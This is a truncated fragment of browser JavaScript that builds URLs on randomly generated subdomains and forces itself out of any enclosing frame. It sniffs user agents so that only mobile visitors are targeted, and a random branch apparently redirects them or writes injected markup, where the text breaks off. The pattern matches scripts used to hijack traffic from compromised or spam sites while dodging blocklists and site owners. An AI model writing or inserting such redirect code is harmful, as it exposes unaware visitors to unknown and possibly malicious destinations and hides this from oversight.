function randomString(e) { var e = e || 32, t = "ABCDEFGHJKMNPQRSTWXYZabcdefhijkmnprstwxyz2345678", a = t.length, n = ""; for (i = 0; i < e; i++) n += t.charAt(Math.floor(Math.random() * a)); return n; } function random1(min, max) { return Math.floor(Math.random() * (max - min)) + min; } function randomUrl(url) { return "https://" + randomString(random1(5, 20)) + "." + url + "?" + randomString(random1(3, 10)); } function topCheck() { if (top.location !== self.location) { top.location = self.location; } } function topCheckAndGo(url) { if (top.location !== self.location) { top.location = self.location; } window.location.href = randomUrl(url); } function browserRedirect(url) { var sUserAgent = navigator.userAgent.toLowerCase(); var bIsIpad = sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs = sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp = sUserAgent.match(/midp/i) == "midp"; var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc = sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid = sUserAgent.match(/android/i) == "android"; var bIsCE = sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM = sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { var intNum1 = Math.round(Math.random() * 11); var result = intNum1 % 2; if (result == 0) { document.writeln("